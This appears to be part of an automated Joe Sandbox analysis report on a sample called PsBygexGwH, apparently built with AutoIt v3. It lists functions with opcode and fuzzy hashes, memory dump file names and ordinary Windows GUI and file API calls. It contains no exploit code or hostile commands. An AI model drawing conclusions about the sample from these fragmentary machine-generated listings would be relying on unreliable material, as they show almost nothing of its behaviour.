Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a6ff5ba3592d3e7f5ce860258c9a36ebcebac4fd9076e4ac1dafbfa639b19007
Instruction ID: 83cce5d77c1433a6702f48b1d031cb63cb822b203a2c4ab72f1c96b9eb4041be
Opcode Fuzzy Hash: a6ff5ba3592d3e7f5ce860258c9a36ebcebac4fd9076e4ac1dafbfa639b19007
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0014781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0014798B

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: d0aa600431a40360402e13087e443fc2722c40f1d2892211d9da8c8db4bbcb6e
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: DB51897160C70B9BDF3C8578C85E7BE63899B22358F180919D886D72F2C715DE06D352

Uniqueness

Uniqueness Score: -1.00%

Function 00156DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cce2854834173eb4d678fe795111fbea7082152880a6910a873b6c91c2ccf56
Instruction ID: ab9656c980cb12d4d99b19aa1c0c8e5e43d693c2290af8cf09d701ea95d33f4f
Opcode Fuzzy Hash: 1cce2854834173eb4d678fe795111fbea7082152880a6910a873b6c91c2ccf56
Instruction Fuzzy Hash: 4732D222D29F418ED7239634D822335A649AFB73D6F15D737E82AB9DA5EB29C4C34100

Uniqueness

Uniqueness Score: -1.00%

Function 0013CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69b9a0cae9e09a2de7062e7e764208407016b5591757cb25a4b4b0a0dbdbfa30
Instruction ID: 4dbf0172358f63f8dd138a5a7771bbaf1f055c43cd98d23800fedef7c4e88aba
Opcode Fuzzy Hash: 69b9a0cae9e09a2de7062e7e764208407016b5591757cb25a4b4b0a0dbdbfa30
Instruction Fuzzy Hash: 0432F032A041558BCF28CE69C4D46BD7BB1EB45310F29C56EE85EAB291E730DD82DBC1

Uniqueness

Uniqueness Score: -1.00%

Function 00127920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 845990f5b901132f3025e89567b8ef908300a7655d9597b5a7ee1dbe3c2a86a5
Instruction ID: 32d775d99d1f3a8bb32498fce3b4b15a478e8a315ab00a2e671cb7dbef2903da
Opcode Fuzzy Hash: 845990f5b901132f3025e89567b8ef908300a7655d9597b5a7ee1dbe3c2a86a5
Instruction Fuzzy Hash: 9A22D370A0061ADFDF14CFA5D881AAEB3F2FF54300F144529E816A7291EB369D61CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001291C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf3b8ce374fb8f5148e0543118958bbbdb5064d55cfd66d1ebed16acaca5d68
Instruction ID: 02a60f9fdb2658b4ffc6efbb9ba1437258db268c26fded7b96f7fa0bf09a16ed
Opcode Fuzzy Hash: 5cf3b8ce374fb8f5148e0543118958bbbdb5064d55cfd66d1ebed16acaca5d68
Instruction Fuzzy Hash: 5D02A4B5E00219EFDF04DF64D881AAEB7F1FF54304F118169E8169B291EB31AA61CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00141C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 312787e1000f27293658ed345d4a740b1c97717c83f158e483311c894c708763
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: C49177736080E35ADB2E467A857407EFFE15B523A131A079DD4F2CA1E1FF208994D620

Uniqueness

Uniqueness Score: -1.00%

Function 001419B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 46bbf12745adb90e07f851f838487eb3025361aa820a312ef5d1967160b1f8c8
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 489132722090E35ADB6D467A857403EFFF19B923A631A079ED4F2CB1E1FF248594D620

Uniqueness

Uniqueness Score: -1.00%

Function 00147A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1eb590d0f234c92f5196340be234bb407b127b054ac73eb4b4713c6c05604cf
Instruction ID: 56283ea5f5ceeb7d19ec90b40f298e5967875f88a3a32f5582d13097bcc2c4ea
Opcode Fuzzy Hash: a1eb590d0f234c92f5196340be234bb407b127b054ac73eb4b4713c6c05604cf
Instruction Fuzzy Hash: AA617A7160874A9ADE38AA288D95BBE2394DF51704F280D1EF983DB2F1DB11DE42C356

Uniqueness

Uniqueness Score: -1.00%

Function 00147CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3e4a96ac8eef394d975935baea50553b5aaba4d14fa8a0e9ddf03a43c050552
Instruction ID: 6a9471cd99a035921a55e97468ecd08d9ec3a8afd2ee417f52c0ff4762b8d416
Opcode Fuzzy Hash: a3e4a96ac8eef394d975935baea50553b5aaba4d14fa8a0e9ddf03a43c050552
Instruction Fuzzy Hash: 9161CD71E2C74967CE399AA88C91BBF2388DF52748F100A59E943EB2F1DB12DD428351

Uniqueness

Uniqueness Score: -1.00%

Function 00141706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 8ff9064fce29b3725439a2bdd95fed567a98ee66780120b9c5a824b04da9fcf2
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 198173336080E359DB6D427AC53443EFFE15B923A631A079DD4F2CA1E1EF248594E620

Uniqueness

Uniqueness Score: -1.00%

Function 023C37C0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 4bbf544400284870ceb1cbdd56ac5de579fe91ad86a635a534e26e103f8be967
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 2341B571D1051CDBCF48CFADC991AEEBBF1AF88201F648299D516AB345D730AB41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00192046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6af327a9fe5a7945e9df43d1e51e623e3dcc37223dfa121cf9125844fc5c15d8
Instruction ID: a55996455f96ecab6f89a8ca4478cbcdf5a61b1e2e21111683939cedcccffb80
Opcode Fuzzy Hash: 6af327a9fe5a7945e9df43d1e51e623e3dcc37223dfa121cf9125844fc5c15d8
Instruction Fuzzy Hash: 1321BB326205158BDB28CF79C81367E73E5A754320F19862EE4A7C37D1DE35AD44C780

Uniqueness

Uniqueness Score: -1.00%

Function 023C36B0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: ae7aac6bcb1b4f597747ca9934b56de2030018843f0951f59b41232fd2b238e3
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: C3019278A14109EFCB44DF98C5909AEF7F5FB48310F2085D9D819A7701E730AE51DB80

Uniqueness

Uniqueness Score: -1.00%

Function 023C3650 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: d75d09763ef0d0e60f078163463440599f68467aaaadce6f8a5bbd6af4db55a5
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 76019278A01209EFCB48DF98C5909AEF7F5FB48310F2085D9D819A7701E730AE51DB80

Uniqueness

Uniqueness Score: -1.00%

Function 023C1ED0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2976070733.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23c0000_PsBygexGwH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Uniqueness

Uniqueness Score: -1.00%

Function 001A2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 001A2B30
DeleteObject.GDI32(00000000), ref: 001A2B43
DestroyWindow.USER32 ref: 001A2B52
GetDesktopWindow.USER32 ref: 001A2B6D
GetWindowRect.USER32(00000000), ref: 001A2B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 001A2CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 001A2CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2CF8
GetClientRect.USER32(00000000,?), ref: 001A2D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 001A2D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2D80
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2D98
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2DA8
GlobalFree.KERNEL32(00000000), ref: 001A2DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,001BFC38,00000000), ref: 001A2DDB
GlobalFree.KERNEL32(00000000), ref: 001A2DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 001A2E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 001A2E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A2E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001A303F

Strings

AutoIt v3, xrefs: 001A2CF2
DISPLAY, xrefs: 001A2EA2
, xrefs: 001A2FC5
static, xrefs: 001A2D3A, 001A2E91

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: cd4114e9e80147eec0a610ec1f60b09a503ff65d24e0173696afaf8c092c1cb8
Instruction ID: 05afcb2bc5cc7bf6e99c6f5b5279174b68c5000f525a0c3d0debc6b7dd5a30d4
Opcode Fuzzy Hash: cd4114e9e80147eec0a610ec1f60b09a503ff65d24e0173696afaf8c092c1cb8
Instruction Fuzzy Hash: B7025D75900215EFDB14DF68DC89EAE7BB9FB49720F008158F915AB2A1C770ED41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001B70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 001B712F
GetSysColorBrush.USER32(0000000F), ref: 001B7160
GetSysColor.USER32(0000000F), ref: 001B716C
SetBkColor.GDI32(?,000000FF), ref: 001B7186
SelectObject.GDI32(?,?), ref: 001B7195
InflateRect.USER32(?,000000FF,000000FF), ref: 001B71C0
GetSysColor.USER32(00000010), ref: 001B71C8
CreateSolidBrush.GDI32(00000000), ref: 001B71CF
FrameRect.USER32(?,?,00000000), ref: 001B71DE
DeleteObject.GDI32(00000000), ref: 001B71E5
InflateRect.USER32(?,000000FE,000000FE), ref: 001B7230
FillRect.USER32(?,?,?), ref: 001B7262
GetWindowLongW.USER32(?,000000F0), ref: 001B7284

Part of subcall function 001B73E8: GetSysColor.USER32(00000012), ref: 001B7421
Part of subcall function 001B73E8: SetTextColor.GDI32(?,?), ref: 001B7425
Part of subcall function 001B73E8: GetSysColorBrush.USER32(0000000F), ref: 001B743B
Part of subcall function 001B73E8: GetSysColor.USER32(0000000F), ref: 001B7446
Part of subcall function 001B73E8: GetSysColor.USER32(00000011), ref: 001B7463
Part of subcall function 001B73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 001B7471
Part of subcall function 001B73E8: SelectObject.GDI32(?,00000000), ref: 001B7482
Part of subcall function 001B73E8: SetBkColor.GDI32(?,00000000), ref: 001B748B
Part of subcall function 001B73E8: SelectObject.GDI32(?,?), ref: 001B7498
Part of subcall function 001B73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 001B74B7
Part of subcall function 001B73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001B74CE
Part of subcall function 001B73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 001B74DB

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: a84e31ce9a99899810280e4227b408ca08dc88b785f78681a9a8ae6b5228ce9b
Instruction ID: 5a4235c85e35af18e26a2a71318a5c2967c56ecd9a0d4767248d2157c4ba3158
Opcode Fuzzy Hash: a84e31ce9a99899810280e4227b408ca08dc88b785f78681a9a8ae6b5228ce9b
Instruction Fuzzy Hash: 73A17172108301FFD7119F64DC48E9B7BA9FB89321F100B19F9A2A65E1D771E984CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00138D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00138E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00176AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00176AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00176F43

Part of subcall function 00138F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00138BE8,?,00000000,?,?,?,?,00138BBA,00000000,?), ref: 00138FC5

SendMessageW.USER32(?,00001053), ref: 00176F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00176F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00176FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00176FB7

Strings

0, xrefs: 00176DCF

Memory Dump Source

Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true

Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: ff3b7037648ef10357ded40dd8fce9edaa1946a1087395bf3b8029f5a9347f93
Instruction ID: 58a0cba8b3783673c4424de00a552fb212ecfed3d8382729a13cfa5c94080ebf
Opcode Fuzzy Hash: ff3b7037648ef10357ded40dd8fce9edaa1946a1087395bf3b8029f5a9347f93
Instruction Fuzzy Hash: 8B128930200A01EFDB25DF24C894BBABBB5FB59314F148569F489DB661CB71EC92CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001A2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 001A273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001A286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 001A28A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 001A28B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 001A2900
GetClientRect.USER32(00000000,?), ref: 001A290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 001A2955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001A2964
GetStockObject.GDI32(00000011), ref: 001A2974
SelectObject.GDI32(00000000,00000000), ref: 001A2978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 001A2988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 001A2991
